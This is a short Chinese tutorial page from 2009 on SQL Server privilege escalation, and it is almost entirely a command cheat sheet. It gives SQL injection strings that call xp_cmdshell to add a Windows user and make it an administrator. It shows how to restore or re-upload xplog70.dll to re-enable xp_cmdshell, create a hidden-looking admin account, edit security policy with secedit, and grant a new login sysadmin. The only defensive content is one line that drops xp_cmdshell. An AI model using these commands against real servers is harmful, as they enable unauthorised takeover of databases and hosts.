当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL Server提升权限相关命令及防范

MSSQL
SQL Server数据库技术(60)
SQL Server数据库技术(61)
SQL Server数据库技术(62)
SQL Server数据库技术(63)
SQL Server数据库技术(64)
SQL Server数据库技术(66)
SQL Server数据库技术(67)
SQL Server数据库技术(69)
SQL Server数据库技术(70)
SQL Server数据库技术(71)
SQL Server数据库技术(72)
SQL Server数据库技术(73)
SQL Server数据库技术(74)
SQL Server数据库技术(75)
SQL Server数据库技术(76)
SQL Server数据库技术(77)
SQL Server数据库技术(78)
SQL Server数据库技术(79)
SQL Server数据库技术(80)
SQL Server数据库技术(81)

MSSQL 中的 SQL Server提升权限相关命令及防范


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-30   浏览: 58 ::
收藏到网摘: n/a

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin